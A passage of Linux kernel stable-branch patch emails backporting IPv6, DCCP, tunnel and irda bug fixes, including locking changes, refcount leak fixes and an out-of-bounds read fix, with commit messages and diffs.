*/ return; ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len); @@ -2358,7 +2378,7 @@ ok: } #endif in6_ifa_put(ifp); - addrconf_verify(0); + addrconf_verify(); } } inet6_prefix_notify(RTM_NEWPREFIX, in6_dev, pinfo); @@ -2501,7 +2521,7 @@ static int inet6_addr_add(struct net *net, int ifindex, const struct in6_addr *p */ addrconf_dad_start(ifp); in6_ifa_put(ifp); - addrconf_verify(0); + addrconf_verify_rtnl(); return 0; } @@ -3082,7 +3102,7 @@ static int addrconf_ifdown(struct net_device *dev, int how) hlist_for_each_entry_rcu(ifa, h, addr_lst) { if (ifa->idev == idev) { hlist_del_init_rcu(&ifa->addr_lst); - addrconf_del_dad_timer(ifa); + addrconf_del_dad_work(ifa); goto restart; } } @@ -3122,7 +3142,7 @@ static int addrconf_ifdown(struct net_device *dev, int how) while (!list_empty(&idev->addr_list)) { ifa = list_first_entry(&idev->addr_list, struct inet6_ifaddr, if_list); - addrconf_del_dad_timer(ifa); + addrconf_del_dad_work(ifa); list_del(&ifa->if_list); @@ -3217,10 +3237,10 @@ static void addrconf_dad_kick(struct inet6_ifaddr *ifp) rand_num = net_random() % (idev->cnf.rtr_solicit_delay ? : 1); ifp->dad_probes = idev->cnf.dad_transmits; - addrconf_mod_dad_timer(ifp, rand_num); + addrconf_mod_dad_work(ifp, rand_num); } -static void addrconf_dad_start(struct inet6_ifaddr *ifp) +static void addrconf_dad_begin(struct inet6_ifaddr *ifp) { struct inet6_dev *idev = ifp->idev; struct net_device *dev = idev->dev; @@ -3272,25 +3292,68 @@ out: read_unlock_bh(&idev->lock); } -static void addrconf_dad_timer(unsigned long data) +static void addrconf_dad_start(struct inet6_ifaddr *ifp) { - struct inet6_ifaddr *ifp = (struct inet6_ifaddr *) data; + bool begin_dad = false; + + spin_lock_bh(&ifp->state_lock); + if (ifp->state != INET6_IFADDR_STATE_DEAD) { + ifp->state = INET6_IFADDR_STATE_PREDAD; + begin_dad = true; + } + spin_unlock_bh(&ifp->state_lock); + + if (begin_dad) + addrconf_mod_dad_work(ifp, 0); +} + +static void addrconf_dad_work(struct work_struct *w) +{ + struct inet6_ifaddr *ifp = container_of(to_delayed_work(w), + struct inet6_ifaddr, + dad_work); struct inet6_dev *idev = ifp->idev; struct in6_addr mcaddr; + enum { + DAD_PROCESS, + DAD_BEGIN, + DAD_ABORT, + } action = DAD_PROCESS; + + rtnl_lock(); + + spin_lock_bh(&ifp->state_lock); + if (ifp->state == INET6_IFADDR_STATE_PREDAD) { + action = DAD_BEGIN; + ifp->state = INET6_IFADDR_STATE_DAD; + } else if (ifp->state == INET6_IFADDR_STATE_ERRDAD) { + action = DAD_ABORT; + ifp->state = INET6_IFADDR_STATE_POSTDAD; + } + spin_unlock_bh(&ifp->state_lock); + + if (action == DAD_BEGIN) { + addrconf_dad_begin(ifp); + goto out; + } else if (action == DAD_ABORT) { + addrconf_dad_stop(ifp, 1); + goto out; + } + if (!ifp->dad_probes && addrconf_dad_end(ifp)) goto out; - write_lock(&idev->lock); + write_lock_bh(&idev->lock); if (idev->dead || !(idev->if_flags & IF_READY)) { - write_unlock(&idev->lock); + write_unlock_bh(&idev->lock); goto out; } spin_lock(&ifp->lock); if (ifp->state == INET6_IFADDR_STATE_DEAD) { spin_unlock(&ifp->lock); - write_unlock(&idev->lock); + write_unlock_bh(&idev->lock); goto out; } @@ -3301,7 +3364,7 @@ static void addrconf_dad_timer(unsigned long data) ifp->flags &= ~(IFA_F_TENTATIVE|IFA_F_OPTIMISTIC|IFA_F_DADFAILED); spin_unlock(&ifp->lock); - write_unlock(&idev->lock); + write_unlock_bh(&idev->lock); addrconf_dad_completed(ifp); @@ -3309,15 +3372,16 @@ static void addrconf_dad_timer(unsigned long data) } ifp->dad_probes--; - addrconf_mod_dad_timer(ifp, ifp->idev->nd_parms->retrans_time); + addrconf_mod_dad_work(ifp, ifp->idev->nd_parms->retrans_time); spin_unlock(&ifp->lock); - write_unlock(&idev->lock); + write_unlock_bh(&idev->lock); /* send a neighbour solicitation for our addr */ addrconf_addr_solict_mult(&ifp->addr, &mcaddr); ndisc_send_ns(ifp->idev->dev, NULL, &ifp->addr, &mcaddr, &in6addr_any); out: in6_ifa_put(ifp); + rtnl_unlock(); } static void addrconf_dad_completed(struct inet6_ifaddr *ifp) @@ -3325,7 +3389,7 @@ static void addrconf_dad_completed(struct inet6_ifaddr *ifp) struct net_device *dev = ifp->idev->dev; struct in6_addr lladdr; - addrconf_del_dad_timer(ifp); + addrconf_del_dad_work(ifp); /* * Configure the address for reception. Now it is valid. @@ -3557,23 +3621,23 @@ int ipv6_chk_home_addr(struct net *net, const struct in6_addr *addr) * Periodic address status verification */ -static void addrconf_verify(unsigned long foo) +static void addrconf_verify_rtnl(void) { unsigned long now, next, next_sec, next_sched; struct inet6_ifaddr *ifp; int i; + ASSERT_RTNL(); + rcu_read_lock_bh(); - spin_lock(&addrconf_verify_lock); now = jiffies; next = round_jiffies_up(now + ADDR_CHECK_FREQUENCY); - del_timer(&addr_chk_timer); + cancel_delayed_work(&addr_chk_work); for (i = 0; i < IN6_ADDR_HSIZE; i++) { restart: - hlist_for_each_entry_rcu_bh(ifp, - &inet6_addr_lst[i], addr_lst) { + hlist_for_each_entry_rcu_bh(ifp, &inet6_addr_lst[i], addr_lst) { unsigned long age; if (ifp->flags & IFA_F_PERMANENT) @@ -3664,13 +3728,22 @@ restart: ADBG((KERN_DEBUG "now = %lu, schedule = %lu, rounded schedule = %lu => %lu\n", now, next, next_sec, next_sched)); - - addr_chk_timer.expires = next_sched; - add_timer(&addr_chk_timer); - spin_unlock(&addrconf_verify_lock); + mod_delayed_work(addrconf_wq, &addr_chk_work, next_sched - now); rcu_read_unlock_bh(); } +static void addrconf_verify_work(struct work_struct *w) +{ + rtnl_lock(); + addrconf_verify_rtnl(); + rtnl_unlock(); +} + +static void addrconf_verify(void) +{ + mod_delayed_work(addrconf_wq, &addr_chk_work, 0); +} + static struct in6_addr *extract_addr(struct nlattr *addr, struct nlattr *local) { struct in6_addr *pfx = NULL; @@ -3722,6 +3795,8 @@ static int inet6_addr_modify(struct inet6_ifaddr *ifp, u8 ifa_flags, clock_t expires; unsigned long timeout; + ASSERT_RTNL(); + if (!valid_lft || (prefered_lft > valid_lft)) return -EINVAL; @@ -3755,7 +3830,7 @@ static int inet6_addr_modify(struct inet6_ifaddr *ifp, u8 ifa_flags, addrconf_prefix_route(&ifp->addr, ifp->prefix_len, ifp->idev->dev, expires, flags); - addrconf_verify(0); + addrconf_verify_rtnl(); return 0; } @@ -4364,6 +4439,8 @@ static int inet6_set_iftoken(struct inet6_dev *idev, struct in6_addr *token) bool update_rs = false; struct in6_addr ll_addr; + ASSERT_RTNL(); + if (token == NULL) return -EINVAL; if (ipv6_addr_any(token)) @@ -4409,6 +4486,7 @@ static int inet6_set_iftoken(struct inet6_dev *idev, struct in6_addr *token) } write_unlock_bh(&idev->lock); + addrconf_verify_rtnl(); return 0; } @@ -4610,6 +4688,9 @@ static void __ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp) { struct net *net = dev_net(ifp->idev->dev); + if (event) + ASSERT_RTNL(); + inet6_ifa_notify(event ? : RTM_NEWADDR, ifp); switch (event) { @@ -5138,6 +5219,12 @@ int __init addrconf_init(void) if (err < 0) goto out_addrlabel; + addrconf_wq = create_workqueue("ipv6_addrconf"); + if (!addrconf_wq) { + err = -ENOMEM; + goto out_nowq; + } + /* The addrconf netdev notifier requires that loopback_dev * has it's ipv6 private information allocated and setup * before it can bring up and give link-local addresses @@ -5168,7 +5255,7 @@ int __init addrconf_init(void) register_netdevice_notifier(&ipv6_dev_notf); - addrconf_verify(0); + addrconf_verify(); err = rtnl_af_register(&inet6_ops); if (err < 0) @@ -5199,6 +5286,8 @@ errout: errout_af: unregister_netdevice_notifier(&ipv6_dev_notf); errlo: + destroy_workqueue(addrconf_wq); +out_nowq: unregister_pernet_subsys(&addrconf_ops); out_addrlabel: ipv6_addr_label_cleanup(); @@ -5234,7 +5323,8 @@ void addrconf_cleanup(void) for (i = 0; i < IN6_ADDR_HSIZE; i++) WARN_ON(!hlist_empty(&inet6_addr_lst[i])); spin_unlock_bh(&addrconf_hash_lock); - - del_timer(&addr_chk_timer); + cancel_delayed_work(&addr_chk_work); rtnl_unlock(); + + destroy_workqueue(addrconf_wq); } From 04355d6767db1b57ffb2f1d71727565ba41657b6 Mon Sep 17 00:00:00 2001 From: Wei Yongjun Date: Fri, 16 Dec 2016 14:37:00 +0000 Subject: [PATCH 224/315] ipv6: addrconf: fix dev refcont leak when DAD failed commit 751eb6b6042a596b0080967c1a529a9fe98dac1d upstream. In general, when DAD detected IPv6 duplicate address, ifp->state will be set to INET6_IFADDR_STATE_ERRDAD and DAD is stopped by a delayed work, the call tree should be like this: ndisc_recv_ns -> addrconf_dad_failure <- missing ifp put -> addrconf_mod_dad_work -> schedule addrconf_dad_work() -> addrconf_dad_stop() <- missing ifp hold before call it addrconf_dad_failure() called with ifp refcont holding but not put. addrconf_dad_work() call addrconf_dad_stop() without extra holding refcount. This will not cause any issue normally. But the race between addrconf_dad_failure() and addrconf_dad_work() may cause ifp refcount leak and netdevice can not be unregister, dmesg show the following messages: IPv6: eth0: IPv6 duplicate address fe80::XX:XXXX:XXXX:XX detected! ... unregister_netdevice: waiting for eth0 to become free. Usage count = 1 Cc: stable@vger.kernel.org Fixes: c15b1ccadb32 ("ipv6: move DAD and addrconf_verify processing to workqueue") Signed-off-by: Wei Yongjun Signed-off-by: David S. Miller Cc: # 3.10.y Signed-off-by: Mike Manning Signed-off-by: Willy Tarreau --- net/ipv6/addrconf.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c index 98dd353a873..0f18d8586d3 100644 --- a/net/ipv6/addrconf.c +++ b/net/ipv6/addrconf.c @@ -1694,6 +1694,7 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp) spin_unlock_bh(&ifp->state_lock); addrconf_mod_dad_work(ifp, 0); + in6_ifa_put(ifp); } /* Join to solicited addr multicast group. */ @@ -3337,6 +3338,7 @@ static void addrconf_dad_work(struct work_struct *w) addrconf_dad_begin(ifp); goto out; } else if (action == DAD_ABORT) { + in6_ifa_hold(ifp); addrconf_dad_stop(ifp, 1); goto out; } From b64222a9d3d6d9e770b731020760e49a93f8f29f Mon Sep 17 00:00:00 2001 From: Sabrina Dubroca Date: Fri, 16 Dec 2016 10:16:58 +0000 Subject: [PATCH 225/315] ipv6: fix rtnl locking in setsockopt for anycast and multicast commit a9ed4a2986e13011fcf4ed2d1a1647c53112f55b upstream. Calling setsockopt with IPV6_JOIN_ANYCAST or IPV6_LEAVE_ANYCAST triggers the assertion in addrconf_join_solict()/addrconf_leave_solict() ipv6_sock_ac_join(), ipv6_sock_ac_drop(), ipv6_sock_ac_close() need to take RTNL before calling ipv6_dev_ac_inc/dec. Same thing with ipv6_sock_mc_join(), ipv6_sock_mc_drop(), ipv6_sock_mc_close() before calling ipv6_dev_mc_inc/dec. This patch moves ASSERT_RTNL() up a level in the call stack. Signed-off-by: Cong Wang Signed-off-by: Sabrina Dubroca Reported-by: Tommi Rantala Acked-by: Hannes Frederic Sowa Signed-off-by: David S. Miller Cc: # 3.10.y: b7b1bfce: ipv6: split dad and rs timers Cc: # 3.10.y: c15b1cca: ipv6: move dad to workqueue Cc: # 3.10.y [Mike Manning : resolved minor conflicts in addrconf.c] Signed-off-by: Mike Manning Signed-off-by: Willy Tarreau --- net/ipv6/addrconf.c | 15 +++++---------- net/ipv6/anycast.c | 12 ++++++++++++ net/ipv6/mcast.c | 14 ++++++++++++++ 3 files changed, 31 insertions(+), 10 deletions(-) diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c index 0f18d8586d3..3bfd8a5e564 100644 --- a/net/ipv6/addrconf.c +++ b/net/ipv6/addrconf.c @@ -1697,14 +1697,12 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp) in6_ifa_put(ifp); } -/* Join to solicited addr multicast group. */ - +/* Join to solicited addr multicast group. + * caller must hold RTNL */ void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr) { struct in6_addr maddr; - ASSERT_RTNL(); - if (dev->flags&(IFF_LOOPBACK|IFF_NOARP)) return; @@ -1712,12 +1710,11 @@ void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr) ipv6_dev_mc_inc(dev, &maddr); } +/* caller must hold RTNL */ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr) { struct in6_addr maddr; - ASSERT_RTNL(); - if (idev->dev->flags&(IFF_LOOPBACK|IFF_NOARP)) return; @@ -1725,12 +1722,11 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr) __ipv6_dev_mc_dec(idev, &maddr); } +/* caller must hold RTNL */ static void addrconf_join_anycast(struct inet6_ifaddr *ifp) { struct in6_addr addr; - ASSERT_RTNL(); - if (ifp->prefix_len == 127) /* RFC 6164 */ return; ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len); @@ -1739,12 +1735,11 @@ static void addrconf_join_anycast(struct inet6_ifaddr *ifp) ipv6_dev_ac_inc(ifp->idev->dev, &addr); } +/* caller must hold RTNL */ static void addrconf_leave_anycast(struct inet6_ifaddr *ifp) { struct in6_addr addr; - ASSERT_RTNL(); - if (ifp->prefix_len == 127) /* RFC 6164 */ return; ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len); diff --git a/net/ipv6/anycast.c b/net/ipv6/anycast.c index 5a80f15a9de..c59083c2a65 100644 --- a/net/ipv6/anycast.c +++ b/net/ipv6/anycast.c @@ -77,6 +77,7 @@ int ipv6_sock_ac_join(struct sock *sk, int ifindex, const struct in6_addr *addr) pac->acl_next = NULL; pac->acl_addr = *addr; + rtnl_lock(); rcu_read_lock(); if (ifindex == 0) { struct rt6_info *rt; @@ -137,6 +138,7 @@ int ipv6_sock_ac_join(struct sock *sk, int ifindex, const struct in6_addr *addr) error: rcu_read_unlock(); + rtnl_unlock(); if (pac) sock_kfree_s(sk, pac, sizeof(*pac)); return err; @@ -171,13 +173,17 @@ int ipv6_sock_ac_drop(struct sock *sk, int ifindex, const struct in6_addr *addr) spin_unlock_bh(&ipv6_sk_ac_lock); + rtnl_lock(); rcu_read_lock(); dev = dev_get_by_index_rcu(net, pac->acl_ifindex); if (dev) ipv6_dev_ac_dec(dev, &pac->acl_addr); rcu_read_unlock(); + rtnl_unlock(); sock_kfree_s(sk, pac, sizeof(*pac)); + if (!dev) + return -ENODEV; return 0; } @@ -198,6 +204,7 @@ void ipv6_sock_ac_close(struct sock *sk) spin_unlock_bh(&ipv6_sk_ac_lock); prev_index = 0; + rtnl_lock(); rcu_read_lock(); while (pac) { struct ipv6_ac_socklist *next = pac->acl_next; @@ -212,6 +219,7 @@ void ipv6_sock_ac_close(struct sock *sk) pac = next; } rcu_read_unlock(); + rtnl_unlock(); } static void aca_put(struct ifacaddr6 *ac) @@ -233,6 +241,8 @@ int ipv6_dev_ac_inc(struct net_device *dev, const struct in6_addr *addr) struct rt6_info *rt; int err; + ASSERT_RTNL(); + idev = in6_dev_get(dev); if (idev == NULL) @@ -302,6 +312,8 @@ int __ipv6_dev_ac_dec(struct inet6_dev *idev, const struct in6_addr *addr) { struct ifacaddr6 *aca, *prev_aca; + ASSERT_RTNL(); + write_lock_bh(&idev->lock); prev_aca = NULL; for (aca = idev->ac_list; aca; aca = aca->aca_next) { diff --git a/net/ipv6/mcast.c b/net/ipv6/mcast.c index 7ba6180ff8b..cf16eb484cf 100644 --- a/net/ipv6/mcast.c +++ b/net/ipv6/mcast.c @@ -157,6 +157,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr) mc_lst->next = NULL; mc_lst->addr = *addr; + rtnl_lock(); rcu_read_lock(); if (ifindex == 0) { struct rt6_info *rt; @@ -170,6 +171,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr) if (dev == NULL) { rcu_read_unlock(); + rtnl_unlock(); sock_kfree_s(sk, mc_lst, sizeof(*mc_lst)); return -ENODEV; } @@ -187,6 +189,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr) if (err) { rcu_read_unlock(); + rtnl_unlock(); sock_kfree_s(sk, mc_lst, sizeof(*mc_lst)); return err; } @@ -197,6 +200,7 @@ int ipv6_sock_mc_join(struct sock *sk, int ifindex, const struct in6_addr *addr) spin_unlock(&ipv6_sk_mc_lock); rcu_read_unlock(); + rtnl_unlock(); return 0; } @@ -214,6 +218,7 @@ int ipv6_sock_mc_drop(struct sock *sk, int ifindex, const struct in6_addr *addr) if (!ipv6_addr_is_multicast(addr)) return -EINVAL; + rtnl_lock(); spin_lock(&ipv6_sk_mc_lock); for (lnk = &np->ipv6_mc_list; (mc_lst = rcu_dereference_protected(*lnk, @@ -237,12 +242,15 @@ int ipv6_sock_mc_drop(struct sock *sk, int ifindex, const struct in6_addr *addr) } else (void) ip6_mc_leave_src(sk, mc_lst, NULL); rcu_read_unlock(); + rtnl_unlock(); + atomic_sub(sizeof(*mc_lst), &sk->sk_omem_alloc); kfree_rcu(mc_lst, rcu); return 0; } } spin_unlock(&ipv6_sk_mc_lock); + rtnl_unlock(); return -EADDRNOTAVAIL; } @@ -287,6 +295,7 @@ void ipv6_sock_mc_close(struct sock *sk) if (!rcu_access_pointer(np->ipv6_mc_list)) return; + rtnl_lock(); spin_lock(&ipv6_sk_mc_lock); while ((mc_lst = rcu_dereference_protected(np->ipv6_mc_list, lockdep_is_held(&ipv6_sk_mc_lock))) != NULL) { @@ -313,6 +322,7 @@ void ipv6_sock_mc_close(struct sock *sk) spin_lock(&ipv6_sk_mc_lock); } spin_unlock(&ipv6_sk_mc_lock); + rtnl_unlock(); } int ip6_mc_source(int add, int omode, struct sock *sk, @@ -830,6 +840,8 @@ int ipv6_dev_mc_inc(struct net_device *dev, const struct in6_addr *addr) struct ifmcaddr6 *mc; struct inet6_dev *idev; + ASSERT_RTNL(); + /* we need to take a reference on idev */ idev = in6_dev_get(dev); @@ -901,6 +913,8 @@ int __ipv6_dev_mc_dec(struct inet6_dev *idev, const struct in6_addr *addr) { struct ifmcaddr6 *ma, **map; + ASSERT_RTNL(); + write_lock_bh(&idev->lock); for (map = &idev->mc_list; (ma=*map) != NULL; map = &ma->next) { if (ipv6_addr_equal(&ma->mca_addr, addr)) { From 1735aaba625f3fbf7da6d267e2a97700a39d5588 Mon Sep 17 00:00:00 2001 From: Lance Richardson Date: Fri, 23 Sep 2016 15:50:29 -0400 Subject: [PATCH 226/315] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other() commit db32e4e49ce2b0e5fcc17803d011a401c0a637f6 upstream. Similar to commit 3be07244b733 ("ip6_gre: fix flowi6_proto value in xmit path"), set flowi6_proto to IPPROTO_GRE for output route lookup. Up until now, ip6gre_xmit_other() has set flowi6_proto to a bogus value. This affected output route lookup for packets sent on an ip6gretap device in cases where routing was dependent on the value of flowi6_proto. Since the correct proto is already set in the tunnel flowi6 template via commit 252f3f5a1189 ("ip6_gre: Set flowi6_proto as IPPROTO_GRE in xmit path."), simply delete the line setting the incorrect flowi6_proto value. Suggested-by: Jiri Benc Fixes: c12b395a4664 ("gre: Support GRE over IPv6") Reviewed-by: Shmulik Ladkani Signed-off-by: Lance Richardson Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv6/ip6_gre.c | 1 - 1 file changed, 1 deletion(-) diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c index 7eb7267861a..603f251b6ca 100644 --- a/net/ipv6/ip6_gre.c +++ b/net/ipv6/ip6_gre.c @@ -890,7 +890,6 @@ static int ip6gre_xmit_other(struct sk_buff *skb, struct net_device *dev) encap_limit = t->parms.encap_limit; memcpy(&fl6, &t->fl.u.ip6, sizeof(fl6)); - fl6.flowi6_proto = skb->protocol; err = ip6gre_xmit2(skb, dev, 0, &fl6, encap_limit, &mtu); From 14ba02f999dd88a69ee0b1e723780b0aebb6cbe4 Mon Sep 17 00:00:00 2001 From: Nicolas Dichtel Date: Wed, 12 Oct 2016 10:10:40 +0200 Subject: [PATCH 227/315] ipv6: correctly add local routes when lo goes up commit a220445f9f4382c36a53d8ef3e08165fa27f7e2c upstream. The goal of the patch is to fix this scenario: ip link add dummy1 type dummy ip link set dummy1 up ip link set lo down ; ip link set lo up After that sequence, the local route to the link layer address of dummy1 is not there anymore. When the loopback is set down, all local routes are deleted by addrconf_ifdown()/rt6_ifdown(). At this time, the rt6_info entry still exists, because the corresponding idev has a reference on it. After the rcu grace period, dst_rcu_free() is called, and thus ___dst_free(), which will set obsolete to DST_OBSOLETE_DEAD. In this case, init_loopback() is called before dst_rcu_free(), thus obsolete is still sets to something <= 0. So, the function doesn't add the route again. To avoid that race, let's check the rt6 refcnt instead. Fixes: 25fb6ca4ed9c ("net IPv6 : Fix broken IPv6 routing table after loopback down-up") Fixes: a881ae1f625c ("ipv6: don't call addrconf_dst_alloc again when enable lo") Fixes: 33d99113b110 ("ipv6: reallocate addrconf router for ipv6 address when lo device up") Reported-by: Francesco Santoro Reported-by: Samuel Gauthier CC: Balakumaran Kannan CC: Maruthi Thotad CC: Sabrina Dubroca CC: Hannes Frederic Sowa CC: Weilong Chen CC: Gao feng Signed-off-by: Nicolas Dichtel Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv6/addrconf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c index 3bfd8a5e564..a3e2c34d5b7 100644 --- a/net/ipv6/addrconf.c +++ b/net/ipv6/addrconf.c @@ -2709,7 +2709,7 @@ static void init_loopback(struct net_device *dev) * lo device down, release this obsolete dst and * reallocate a new router for ifa. */ - if (sp_ifa->rt->dst.obsolete > 0) { + if (!atomic_read(&sp_ifa->rt->rt6i_ref)) { ip6_rt_put(sp_ifa->rt); sp_ifa->rt = NULL; } else { From bd380617d5d161ea2bbe7a8073b3ca7bca0381e5 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Wed, 2 Nov 2016 20:30:48 -0700 Subject: [PATCH 228/315] ipv6: dccp: fix out of bound access in dccp_v6_err() commit 1aa9d1a0e7eefcc61696e147d123453fc0016005 upstream. dccp_v6_err() does not use pskb_may_pull() and might access garbage. We only need 4 bytes at the beginning of the DCCP header, like TCP, so the 8 bytes pulled in icmpv6_notify() are more than enough. Signed-off-by: Eric Dumazet Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/dccp/ipv6.c | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c index 6cf9f7782ad..fb7210731ae 100644 --- a/net/dccp/ipv6.c +++ b/net/dccp/ipv6.c @@ -83,7 +83,7 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt, u8 type, u8 code, int offset, __be32 info) { const struct ipv6hdr *hdr = (const struct ipv6hdr *)skb->data; - const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset); + const struct dccp_hdr *dh; struct dccp_sock *dp; struct ipv6_pinfo *np; struct sock *sk; @@ -91,12 +91,13 @@ static void dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt, __u64 seq; struct net *net = dev_net(skb->dev); - if (skb->len < offset + sizeof(*dh) || - skb->len < offset + __dccp_basic_hdr_len(dh)) { - ICMP6_INC_STATS_BH(net, __in6_dev_get(skb->dev), - ICMP6_MIB_INERRORS); - return; - } + /* Only need dccph_dport & dccph_sport which are the first + * 4 bytes in dccp header. + * Our caller (icmpv6_notify()) already pulled 8 bytes for us. + */ + BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8); + BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8); + dh = (struct dccp_hdr *)(skb->data + offset); sk = inet6_lookup(net, &dccp_hashinfo, &hdr->daddr, dh->dccph_dport, From c3a924e1d9244711090c7950355474ce422be138 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Thu, 3 Nov 2016 08:59:46 -0700 Subject: [PATCH 229/315] ipv6: dccp: add missing bind_conflict to dccp_ipv6_mapped commit 990ff4d84408fc55942ca6644f67e361737b3d8e upstream. While fuzzing kernel with syzkaller, Andrey reported a nasty crash in inet6_bind() caused by DCCP lacking a required method. Fixes: ab1e0a13d7029 ("[SOCK] proto: Add hashinfo member to struct proto") Signed-off-by: Eric Dumazet Reported-by: Andrey Konovalov Tested-by: Andrey Konovalov Cc: Arnaldo Carvalho de Melo Acked-by: Arnaldo Carvalho de Melo Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/dccp/ipv6.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c index fb7210731ae..94f8224d543 100644 --- a/net/dccp/ipv6.c +++ b/net/dccp/ipv6.c @@ -1014,6 +1014,7 @@ static const struct inet_connection_sock_af_ops dccp_ipv6_mapped = { .getsockopt = ipv6_getsockopt, .addr2sockaddr = inet6_csk_addr2sockaddr, .sockaddr_len = sizeof(struct sockaddr_in6), + .bind_conflict = inet6_csk_bind_conflict, #ifdef CONFIG_COMPAT .compat_setsockopt = compat_ipv6_setsockopt, .compat_getsockopt = compat_ipv6_getsockopt, From b030cd1acc62f47cf8f880d87089611e5e780ad4 Mon Sep 17 00:00:00 2001 From: Eli Cooper Date: Tue, 1 Nov 2016 23:45:12 +0800 Subject: [PATCH 230/315] ip6_tunnel: Clear IP6CB in ip6tunnel_xmit() commit 23f4ffedb7d751c7e298732ba91ca75d224bc1a6 upstream. skb->cb may contain data from previous layers. In the observed scenario, the garbage data were misinterpreted as IP6CB(skb)->frag_max_size, so that small packets sent through the tunnel are mistakenly fragmented. This patch unconditionally clears the control buffer in ip6tunnel_xmit(), which affects ip6_tunnel, ip6_udp_tunnel and ip6_gre. Currently none of these tunnels set IP6CB(skb)->flags, otherwise it needs to be done earlier. Cc: stable@vger.kernel.org Signed-off-by: Eli Cooper Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- include/net/ip6_tunnel.h | 1 + 1 file changed, 1 insertion(+) diff --git a/include/net/ip6_tunnel.h b/include/net/ip6_tunnel.h index 4da5de10d1d..b140c6079e3 100644 --- a/include/net/ip6_tunnel.h +++ b/include/net/ip6_tunnel.h @@ -75,6 +75,7 @@ static inline void ip6tunnel_xmit(struct sk_buff *skb, struct net_device *dev) int pkt_len, err; nf_reset(skb); + memset(skb->cb, 0, sizeof(struct inet6_skb_parm)); pkt_len = skb->len; err = ip6_local_out(skb); From 68836e49662246cf330a4b141854c800af0cf838 Mon Sep 17 00:00:00 2001 From: Paolo Abeni Date: Wed, 16 Nov 2016 16:26:46 +0100 Subject: [PATCH 231/315] ip6_tunnel: disable caching when the traffic class is inherited commit b5c2d49544e5930c96e2632a7eece3f4325a1888 upstream. If an ip6 tunnel is configured to inherit the traffic class from the inner header, the dst_cache must be disabled or it will foul the policy routing. The issue is apprently there since at leat Linux-2.6.12-rc2. Reported-by: Liam McBirnie Cc: Liam McBirnie Acked-by: Hannes Frederic Sowa Signed-off-by: Paolo Abeni Signed-off-by: David S. Miller Signed-off-by: Willy Tarreau --- net/ipv6/ip6_tunnel.c | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/net/ipv6/ip6_tunnel.c b/net/ipv6/ip6_tunnel.c index 31bab1ab007..12984e6794b 100644 --- a/net/ipv6/ip6_tunnel.c +++ b/net/ipv6/ip6_tunnel.c @@ -950,12 +950,21 @@ static int ip6_tnl_xmit2(struct sk_buff *skb, struct ipv6_tel_txoption opt; struct dst_entry *dst = NULL, *ndst = NULL; struct net_device *tdev; + bool use_cache = false; int mtu; unsigned int max_headroom = sizeof(struct ipv6hdr); u8 proto; int err = -1; - if (!fl6->flowi6_mark) + if (!(t->parms.flags & + (IP6_TNL_F_USE_ORIG_TCLASS | IP6_TNL_F_USE_ORIG_FWMARK))) { + /* enable the cache only only if the routing decision does + * not depend on the current inner header value + */ + use_cache = true; + } + + if (use_cache) dst = ip6_tnl_dst_check(t); if (!dst) { ndst = ip6_route_output(net, NULL, fl6); @@ -1012,7 +1021,7 @@ static int ip6_tnl_xmit2(struct sk_buff *skb, skb = new_skb; } skb_dst_drop(skb); - if (fl6->flowi6_mark) { + if (!use_cache) { skb_dst_set(skb, dst); ndst = NULL; } else { From 942878ee52ce0bf0eb65cac7b79b67b0af834069 Mon Sep 17 00:00:00 2001 From: Vegard Nossum Date: Fri, 12 Aug 2016 10:29:13 +0200 Subject: [PATCH 232/315] net/irda: handle iriap_register_lsap() allocation failure commit 5ba092efc7ddff040777ae7162f1d195f513571b upstream. If iriap_register_lsap() fails to allocate memory, self->lsap is set to NULL. However, none of the callers handle the failure and irlmp_connect_request() will happily dereference it: iriap_register_lsap: Unable to allocated LSAP! ================================================================================ UBSAN: Undefined behaviour in net/irda/irlmp.c:378:2 member access within null pointer of type 'struct lsap_cb' CPU: 1 PID: 15403 Comm: trinity-c0 Not tainted 4.8.0-rc1+ #81 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.9.3-0-ge2fc41e-prebuilt.qemu-project.org 04/01/2014 0000000000000000 ffff88010c7e78a8 ffffffff82344f40 0000000041b58ab3 ffffffff84f98000 ffffffff82344e94 ffff88010c7e78d0 ffff88010c7e7880 ffff88010630ad00 ffffffff84a5fae0 ffffffff84d3f5c0 000000000000017a Call Trace: [] dump_stack+0xac/0xfc [] ubsan_epilogue+0xd/0x8a [] 